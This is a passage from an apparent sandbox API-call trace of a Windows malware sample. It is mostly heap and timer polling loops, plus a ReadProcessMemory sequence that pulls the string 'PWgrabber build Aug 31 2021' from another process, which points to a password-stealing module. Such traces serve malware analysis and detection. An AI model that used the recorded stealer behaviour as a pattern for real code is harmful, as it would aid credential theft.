Flags=0x8, Size=0x20) returned 0x32e85260 [0184.386] GetTickCount () returned 0x20a8bdd [0184.386] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85260 | out: hHeap=0x2150000) returned 1 [0184.387] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e78060 | out: hHeap=0x2150000) returned 1 [0184.387] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0184.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0184.474] GetTickCount () returned 0x20a94c1 [0184.474] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e78320 [0184.474] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0184.474] GetTickCount () returned 0x20a94c1 [0184.474] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84c00 [0184.474] GetTickCount () returned 0x20a94c1 [0184.474] GetTickCount () returned 0x20a94c1 [0184.474] GetTickCount () returned 0x20a94c1 [0184.474] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84c00 | out: hHeap=0x2150000) returned 1 [0184.474] GetTickCount () returned 0x20a94c1 [0184.474] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e847e0 [0184.474] GetTickCount () returned 0x20a94c1 [0184.474] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e847e0 | out: hHeap=0x2150000) returned 1 [0184.474] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e78320 | out: hHeap=0x2150000) returned 1 [0184.474] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0184.497] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0184.540] GetTickCount () returned 0x20a9da5 [0184.540] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e783e0 [0184.540] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0184.540] GetTickCount () returned 0x20a9da5 [0184.540] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e848a0 [0184.541] GetTickCount () returned 0x20a9da5 [0184.541] GetTickCount () returned 0x20a9da5 [0184.541] GetTickCount () returned 0x20a9da5 [0184.541] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e848a0 | out: hHeap=0x2150000) returned 1 [0184.541] GetTickCount () returned 0x20a9da5 [0184.541] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85230 [0184.541] GetTickCount () returned 0x20a9da5 [0184.541] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85230 | out: hHeap=0x2150000) returned 1 [0184.541] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e783e0 | out: hHeap=0x2150000) returned 1 [0184.541] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0184.563] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0184.586] GetTickCount () returned 0x20aa66a [0184.586] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77760 [0184.586] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0184.586] GetTickCount () returned 0x20aa66a [0184.586] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e849c0 [0184.586] GetTickCount () returned 0x20aa66a [0184.587] GetTickCount () returned 0x20aa66a [0184.587] GetTickCount () returned 0x20aa66a [0184.587] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e849c0 | out: hHeap=0x2150000) returned 1 [0184.587] GetTickCount () returned 0x20aa66a [0184.587] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84f00 [0184.587] GetTickCount () returned 0x20aa66a [0184.587] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84f00 | out: hHeap=0x2150000) returned 1 [0184.587] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77760 | out: hHeap=0x2150000) returned 1 [0184.587] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0184.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0185.716] GetTickCount () returned 0x20ab365 [0185.716] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e785a0 [0185.716] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0185.716] GetTickCount () returned 0x20ab365 [0185.716] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84d20 [0185.716] GetTickCount () returned 0x20ab365 [0185.716] GetTickCount () returned 0x20ab365 [0185.716] GetTickCount () returned 0x20ab365 [0185.716] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84d20 | out: hHeap=0x2150000) returned 1 [0185.716] GetTickCount () returned 0x20ab365 [0185.716] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84ae0 [0185.716] GetTickCount () returned 0x20ab365 [0185.716] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84ae0 | out: hHeap=0x2150000) returned 1 [0185.717] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e785a0 | out: hHeap=0x2150000) returned 1 [0185.717] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0186.002] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0186.082] GetTickCount () returned 0x20abd62 [0186.082] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77c60 [0186.082] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0186.082] GetTickCount () returned 0x20abd62 [0186.082] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e851d0 [0186.082] GetTickCount () returned 0x20abd62 [0186.082] GetTickCount () returned 0x20abd62 [0186.082] GetTickCount () returned 0x20abd62 [0186.082] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e851d0 | out: hHeap=0x2150000) returned 1 [0186.082] GetTickCount () returned 0x20abd62 [0186.082] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84a50 [0186.082] GetTickCount () returned 0x20abd62 [0186.083] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84a50 | out: hHeap=0x2150000) returned 1 [0186.083] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77c60 | out: hHeap=0x2150000) returned 1 [0186.083] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0186.256] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0186.314] GetTickCount () returned 0x20ac6e3 [0186.314] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e778a0 [0186.314] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0186.314] GetTickCount () returned 0x20ac6e3 [0186.314] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85170 [0186.314] GetTickCount () returned 0x20ac6e3 [0186.314] GetTickCount () returned 0x20ac6e3 [0186.314] GetTickCount () returned 0x20ac6e3 [0186.314] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85170 | out: hHeap=0x2150000) returned 1 [0186.314] GetTickCount () returned 0x20ac6e3 [0186.314] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e851d0 [0186.314] GetTickCount () returned 0x20ac6e3 [0186.314] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e851d0 | out: hHeap=0x2150000) returned 1 [0186.314] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e778a0 | out: hHeap=0x2150000) returned 1 [0186.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0186.387] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0186.430] GetTickCount () returned 0x20acff6 [0186.430] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77760 [0186.430] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0186.430] GetTickCount () returned 0x20acff6 [0186.430] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84990 [0186.430] GetTickCount () returned 0x20acff6 [0186.430] GetTickCount () returned 0x20acff6 [0186.430] GetTickCount () returned 0x20acff6 [0186.430] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84990 | out: hHeap=0x2150000) returned 1 [0186.430] GetTickCount () returned 0x20acff6 [0186.430] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84ff0 [0186.431] GetTickCount () returned 0x20acff6 [0186.431] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84ff0 | out: hHeap=0x2150000) returned 1 [0186.431] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77760 | out: hHeap=0x2150000) returned 1 [0186.431] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0186.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0186.547] GetTickCount () returned 0x20ad8f9 [0186.547] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e780a0 [0186.547] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0186.547] GetTickCount () returned 0x20ad8f9 [0186.547] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e849f0 [0186.547] GetTickCount () returned 0x20ad8f9 [0186.547] GetTickCount () returned 0x20ad8f9 [0186.547] GetTickCount () returned 0x20ad8f9 [0186.547] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e849f0 | out: hHeap=0x2150000) returned 1 [0186.547] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0186.547] GetTickCount () returned 0x20ad8f9 [0186.548] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84d80 [0186.548] GetTickCount () returned 0x20ad8f9 [0186.548] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84d80 | out: hHeap=0x2150000) returned 1 [0186.548] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e780a0 | out: hHeap=0x2150000) returned 1 [0186.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0186.559] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0186.566] GetTickCount () returned 0x20ae19f [0186.566] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77d20 [0186.566] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0186.566] GetTickCount () returned 0x20ae19f [0186.566] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84bd0 [0186.566] GetTickCount () returned 0x20ae19f [0186.566] GetTickCount () returned 0x20ae19f [0186.566] GetTickCount () returned 0x20ae19f [0186.566] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84bd0 | out: hHeap=0x2150000) returned 1 [0186.566] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0186.566] GetTickCount () returned 0x20ae19f [0186.566] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84c00 [0186.566] GetTickCount () returned 0x20ae19f [0186.566] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84c00 | out: hHeap=0x2150000) returned 1 [0186.566] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77d20 | out: hHeap=0x2150000) returned 1 [0186.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0186.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0186.678] GetTickCount () returned 0x20aeaa2 [0186.679] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e784e0 [0186.679] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0186.679] GetTickCount () returned 0x20aeaa2 [0186.679] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85890 [0186.679] GetTickCount () returned 0x20aeaa2 [0186.679] GetTickCount () returned 0x20aeaa2 [0186.679] GetTickCount () returned 0x20aeaa2 [0186.679] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85890 | out: hHeap=0x2150000) returned 1 [0186.679] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0186.679] GetTickCount () returned 0x20aeaa2 [0186.679] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85e90 [0186.679] GetTickCount () returned 0x20aeaa2 [0186.679] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85e90 | out: hHeap=0x2150000) returned 1 [0186.679] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e784e0 | out: hHeap=0x2150000) returned 1 [0186.679] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0186.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0186.773] GetTickCount () returned 0x20af3a5 [0186.773] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0186.773] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0186.773] GetTickCount () returned 0x20af3a5 [0186.773] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86100 [0186.773] GetTickCount () returned 0x20af3a5 [0186.774] GetTickCount () returned 0x20af3a5 [0186.774] GetTickCount () returned 0x20af3a5 [0186.774] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e86100 | out: hHeap=0x2150000) returned 1 [0186.774] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0186.774] GetTickCount () returned 0x20af3a5 [0186.774] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86100 [0186.774] GetTickCount () returned 0x20af3a5 [0186.774] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e86100 | out: hHeap=0x2150000) returned 1 [0186.774] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0186.774] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0186.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0186.897] GetTickCount () returned 0x20afca9 [0186.897] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64f30 [0186.897] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0186.897] GetTickCount () returned 0x20afca9 [0186.897] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86490 [0186.897] GetTickCount () returned 0x20afca9 [0186.897] GetTickCount () returned 0x20afca9 [0186.897] GetTickCount () returned 0x20afca9 [0186.897] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e86490 | out: hHeap=0x2150000) returned 1 [0186.897] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x102 [0186.897] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e41410 [0186.897] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e501d0 [0186.897] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32a44310 [0186.897] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0186.898] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x617270, lpBuffer=0x32e501d0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e501d0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0186.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e501d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0186.898] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e80f30 [0186.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e501d0, cbMultiByte=-1, lpWideCharStr=0x32e80f30, cchWideChar=5 | out: lpWideCharStr="VERS") returned 5 [0186.898] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x613440, lpBuffer=0x32a44310, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32a44310*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0186.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0186.898] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x50) returned 0x32e72340 [0186.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44310, cbMultiByte=-1, lpWideCharStr=0x32e72340, cchWideChar=37 | out: lpWideCharStr="PWgrabber build Aug 31 2021 14:48:44") returned 37 [0186.898] SetEvent (hEvent=0x790) returned 1 [0186.950] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e501d0 | out: hHeap=0x2150000) returned 1 [0186.950] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a44310 | out: hHeap=0x2150000) returned 1 [0186.950] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41410 | out: hHeap=0x2150000) returned 1 [0186.951] GetTickCount () returned 0x20afce7 [0186.951] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86490 [0186.951] GetTickCount () returned 0x20afce7 [0186.951] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87c30 [0186.951] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e41410 [0186.951] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e80fb0 [0186.951] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e64f30, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0x9e8) returned 0x7f0 [0186.951] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80fb0 | out: hHeap=0x2150000) returned 1 [0186.951] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0186.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.007] GetTickCount () returned 0x20b05ac [0187.007] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b70 [0187.007] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.007] GetTickCount () returned 0x20b05ac [0187.007] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e881a0 [0187.007] GetTickCount () returned 0x20b05ac [0187.007] GetTickCount () returned 0x20b05bc [0187.007] GetTickCount () returned 0x20b05bc [0187.007] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e881a0 | out: hHeap=0x2150000) returned 1 [0187.007] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.007] GetTickCount () returned 0x20b05bc [0187.007] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87c60 [0187.007] GetTickCount () returned 0x20b05bc [0187.007] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87c60 | out: hHeap=0x2150000) returned 1 [0187.007] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b70 | out: hHeap=0x2150000) returned 1 [0187.007] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.039] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.040] GetTickCount () returned 0x20b0e71 [0187.040] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650b0 [0187.040] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.040] GetTickCount () returned 0x20b0e71 [0187.040] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87a50 [0187.040] GetTickCount () returned 0x20b0e71 [0187.040] GetTickCount () returned 0x20b0e71 [0187.040] GetTickCount () returned 0x20b0e71 [0187.040] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87a50 | out: hHeap=0x2150000) returned 1 [0187.040] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.040] GetTickCount () returned 0x20b0e71 [0187.040] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f00 [0187.040] GetTickCount () returned 0x20b0e71 [0187.040] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87f00 | out: hHeap=0x2150000) returned 1 [0187.040] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650b0 | out: hHeap=0x2150000) returned 1 [0187.040] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.042] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.043] GetTickCount () returned 0x20b1707 [0187.043] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e30 [0187.043] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.043] GetTickCount () returned 0x20b1707 [0187.043] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88230 [0187.043] GetTickCount () returned 0x20b1707 [0187.044] GetTickCount () returned 0x20b1707 [0187.044] GetTickCount () returned 0x20b1707 [0187.044] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88230 | out: hHeap=0x2150000) returned 1 [0187.044] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.044] GetTickCount () returned 0x20b1707 [0187.044] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87cf0 [0187.044] GetTickCount () returned 0x20b1707 [0187.044] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87cf0 | out: hHeap=0x2150000) returned 1 [0187.044] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e30 | out: hHeap=0x2150000) returned 1 [0187.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.045] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.047] GetTickCount () returned 0x20b1f9d [0187.047] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ff0 [0187.047] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.047] GetTickCount () returned 0x20b1f9d [0187.047] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87fc0 [0187.047] GetTickCount () returned 0x20b1f9d [0187.047] GetTickCount () returned 0x20b1f9d [0187.047] GetTickCount () returned 0x20b1f9d [0187.047] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87fc0 | out: hHeap=0x2150000) returned 1 [0187.047] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.047] GetTickCount () returned 0x20b1f9d [0187.047] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e880e0 [0187.047] GetTickCount () returned 0x20b1f9d [0187.047] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e880e0 | out: hHeap=0x2150000) returned 1 [0187.048] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ff0 | out: hHeap=0x2150000) returned 1 [0187.048] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.049] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.055] GetTickCount () returned 0x20b2843 [0187.055] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e30 [0187.055] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.055] GetTickCount () returned 0x20b2843 [0187.055] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87780 [0187.055] GetTickCount () returned 0x20b2843 [0187.055] GetTickCount () returned 0x20b2843 [0187.055] GetTickCount () returned 0x20b2843 [0187.055] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87780 | out: hHeap=0x2150000) returned 1 [0187.055] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.055] GetTickCount () returned 0x20b2843 [0187.056] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f30 [0187.056] GetTickCount () returned 0x20b2843 [0187.056] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87f30 | out: hHeap=0x2150000) returned 1 [0187.056] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e30 | out: hHeap=0x2150000) returned 1 [0187.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.057] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.060] GetTickCount () returned 0x20b30d9 [0187.060] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e70 [0187.060] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.061] GetTickCount () returned 0x20b30d9 [0187.061] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e878d0 [0187.061] GetTickCount () returned 0x20b30d9 [0187.061] GetTickCount () returned 0x20b30d9 [0187.061] GetTickCount () returned 0x20b30d9 [0187.061] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e878d0 | out: hHeap=0x2150000) returned 1 [0187.061] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.061] GetTickCount () returned 0x20b30d9 [0187.061] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ed0 [0187.061] GetTickCount () returned 0x20b30d9 [0187.061] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87ed0 | out: hHeap=0x2150000) returned 1 [0187.061] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e70 | out: hHeap=0x2150000) returned 1 [0187.061] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.062] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.064] GetTickCount () returned 0x20b396f [0187.064] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e30 [0187.064] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.064] GetTickCount () returned 0x20b396f [0187.064] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88050 [0187.064] GetTickCount () returned 0x20b396f [0187.064] GetTickCount () returned 0x20b396f [0187.064] GetTickCount () returned 0x20b396f [0187.064] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88050 | out: hHeap=0x2150000) returned 1 [0187.064] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.064] GetTickCount () returned 0x20b396f [0187.064] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e880e0 [0187.064] GetTickCount () returned 0x20b396f [0187.064] HeapFree (in: hHeap=0x2150000, 